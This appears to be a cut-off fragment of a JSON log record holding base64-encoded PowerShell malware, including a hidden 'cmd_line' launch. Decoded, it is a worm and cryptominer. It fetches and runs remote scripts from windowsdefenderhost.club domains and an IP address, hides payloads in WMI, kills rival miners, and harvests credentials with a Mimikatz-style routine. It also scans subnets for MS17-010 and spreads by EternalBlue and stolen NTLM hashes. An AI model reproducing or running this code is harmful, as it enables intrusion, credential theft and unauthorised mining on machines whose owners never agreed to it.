AAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8